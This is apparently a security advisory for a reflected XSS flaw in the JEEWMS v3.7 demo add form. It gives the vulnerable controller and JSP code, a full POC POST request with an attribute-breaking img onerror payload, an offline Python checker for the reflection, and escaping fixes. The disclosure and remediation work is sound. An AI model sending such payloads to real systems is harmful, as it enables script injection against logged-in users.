Summary

A reflected cross-site scripting (XSS) vulnerability has been discovered in JEEWMS v3.7 in the JeecgListDemoController module. An attacker can inject JavaScript through the name parameter; the value is reflected into the add-form page without output encoding, so arbitrary script runs in the browser context of the (authenticated) victim who loads the page.

Authentication: Yes
Exploitable: Remote

Detail

Backend Controller

File: src/main/java/com/jeecg/demo/controller/JeecgListDemoController.java

Method: doAdd() (Lines 311-327)

Mapping: @RequestMapping(params = "doAdd")

Vulnerable Code Flow:

@RequestMapping(params = "doAdd")
@ResponseBody
public AjaxJson doAdd(JeecgDemoEntity jeecgDemo, HttpServletRequest request) {
    AjaxJson j = new AjaxJson();
    // Request parameters (including name) are bound to the entity without validation
    // If save fails, user may be redirected to form page
    // with input values pre-populated from request
    jeecgDemoService.save(jeecgDemo);
    return j;
}

Frontend JSP (Reflected Output)

File: webpage/com/jeecg/demo/jeecgDemo-add.jsp (Line 26)

Vulnerable Code:

<input id="name" name="name" type="text" style="width: 150px" class="inputxt"
       datatype="*" value='${jeecgDemoPage.name}'/>

Critical Issue: The name field is written into the value attribute by a bare EL expression. JSP EL does not HTML-encode its output, so the user-controlled string is embedded in the attribute without any sanitization or encoding. Note that the attribute in this snippet is single-quoted: a value can only close it with a single quote, whereas the POC payload uses a double quote (%22). Check which quote character the deployed template actually uses when reproducing; encoding both quote characters (fn:escapeXml or c:out) closes the attribute context either way.

POC

  1. Request with XSS payload
POST /jeewms/jeecgListDemoController.do?doAdd HTTP/1.1
Host: localhost:8081
Sec-Fetch-Site: same-origin
Origin: http://localhost:8081
Accept-Language: zh-CN,zh;q=0.9
Sec-Fetch-Dest: empty
Accept: application/json, text/javascript, */*; q=0.01
sec-ch-ua-platform: "Windows"
Accept-Encoding: gzip, deflate, br, zstd
sec-ch-ua-mobile: ?0
Sec-Fetch-Mode: cors
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: JSESSIONID=21B9CFD8FBBE6D693DEBC0F9690E5870; JEECGINDEXSTYLE=ace; ZINDEXNUMBER=2030
sec-ch-ua: "Not(A:Brand";v="8", "Chromium";v="144", "Google Chrome";v="144"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Referer: http://localhost:8081/jeewms/jeecgListDemoController.do?goAdd&_=1770819352096
Content-Length: 203

id=&createDate=&createBy=&createName=&updateBy=&updateDate=&updateName=&name=%22%3E%3Cimg+src%3D1+onerror%3Dalert(1)%3E&age=1&birthday=&depId=&email=1%40qq.com&phone=13888888888&salary=&status=N&content=

The name parameter decodes to "><img src=1 onerror=alert(1)>. Because doAdd is annotated @ResponseBody and returns an AjaxJson object, its own response is not the reflecting page; confirm the reflection in the HTML of the add form (jeecgDemo-add.jsp) rendered with the submitted entity, where the value appears unencoded inside the value attribute.

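As an added example (not code from JEEWMS or from the original report), the following Python script models the reflection point offline: it decodes the POC's name parameter, re-renders the value='${jeecgDemoPage.name}' attribute from jeecgDemo-add.jsp with and without JSTL-style escaping, and tokenizes the result the way a browser would to see whether a new element carrying an on* handler appears. The form-field template, the double-quoted variant and all helper names are assumptions for illustration; the field names and values come from the POC request above.

```python
"""Offline model of the JEEWMS add-form reflection point.

Added example, not code from JEEWMS or the original report. The form-field
template and helper names are assumptions; field names/values are taken from
the POC request.
"""
from __future__ import annotations

from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode

# Request body copied from the POC; the name value decodes to "><img src=1 onerror=alert(1)>
POC_BODY = ("id=&createDate=&createBy=&createName=&updateBy=&updateDate=&updateName="
            "&name=%22%3E%3Cimg+src%3D1+onerror%3Dalert(1)%3E&age=1&birthday=&depId="
            "&email=1%40qq.com&phone=13888888888&salary=&status=N&content=")
POC_NAME = '"><img src=1 onerror=alert(1)>'

# Simplified copy of the input element from jeecgDemo-add.jsp; {q} is the attribute quote
# (the advisory shows a single quote; the double-quoted variant is an assumption)
FORM_FIELD = ('<input id="name" name="name" type="text" style="width: 150px" '
              'class="inputxt" datatype="*" value={q}{value}{q}/>')


def decode_name(body: str) -> str:
    """Return the decoded name field of a form-urlencoded doAdd body."""
    return parse_qs(body, keep_blank_values=True)["name"][0]


def build_doadd_body(name: str) -> str:
    """Build a doAdd body with the POC's field set and a chosen name value."""
    fields = [("id", ""), ("createDate", ""), ("createBy", ""), ("createName", ""),
              ("updateBy", ""), ("updateDate", ""), ("updateName", ""), ("name", name),
              ("age", "1"), ("birthday", ""), ("depId", ""), ("email", "1@qq.com"),
              ("phone", "13888888888"), ("salary", ""), ("status", "N"), ("content", "")]
    return urlencode(fields)


def escape_xml(value: str) -> str:
    """Encode the same five characters JSTL's fn:escapeXml / <c:out> encode."""
    return value.translate({ord("&"): "&amp;", ord("<"): "&lt;", ord(">"): "&gt;",
                            ord('"'): "&#034;", ord("'"): "&#039;"})


def render_vulnerable(name: str, quote: str = "'") -> str:
    """Mimic value='${jeecgDemoPage.name}': JSP EL writes the string unencoded."""
    return FORM_FIELD.format(q=quote, value=name)


def render_fixed(name: str, quote: str = "'") -> str:
    """Mimic value='${fn:escapeXml(jeecgDemoPage.name)}'."""
    return FORM_FIELD.format(q=quote, value=escape_xml(name))


class _TagCollector(HTMLParser):
    """Collect every start tag (including self-closing ones) with its attributes."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[tuple[str, dict]] = []

    def handle_starttag(self, tag, attrs):  # also reached for <.../> tags
        self.tags.append((tag, dict(attrs)))


def injected_event_handlers(fragment: str) -> list[tuple[str, str, str | None]]:
    """Tokenize rendered HTML like a browser and return every on* attribute.

    The legitimate form field carries no event handler, so any hit means the
    submitted value closed the attribute and started a new element.
    """
    parser = _TagCollector()
    parser.feed(fragment)
    parser.close()
    return [(tag, k, v) for tag, attrs in parser.tags
            for k, v in attrs.items() if k.startswith("on")]


if __name__ == "__main__":
    assert decode_name(POC_BODY) == POC_NAME
    for quote in ("'", '"'):
        for payload in (POC_NAME, "'><img src=1 onerror=alert(1)>"):
            hit = injected_event_handlers(render_vulnerable(payload, quote))
            print(f"template quote {quote!r} payload {payload!r:36} -> {hit}")
            # encoding both quote characters neutralizes the breakout either way
            assert injected_event_handlers(render_fixed(payload, quote)) == []
```

Run it directly for a table of which payload breaks out of which quoting: the %22 payload from the POC only escapes a double-quoted attribute, while a single-quote variant escapes the single-quoted one shown in the JSP snippet. When reproducing against a live instance, feed the HTML of the rendered add form (not the JSON that doAdd returns) into injected_event_handlers; a non-empty result confirms the reflection. In the JSP itself the equivalent fix is ${fn:escapeXml(jeecgDemoPage.name)} or <c:out value="${jeecgDemoPage.name}"/>.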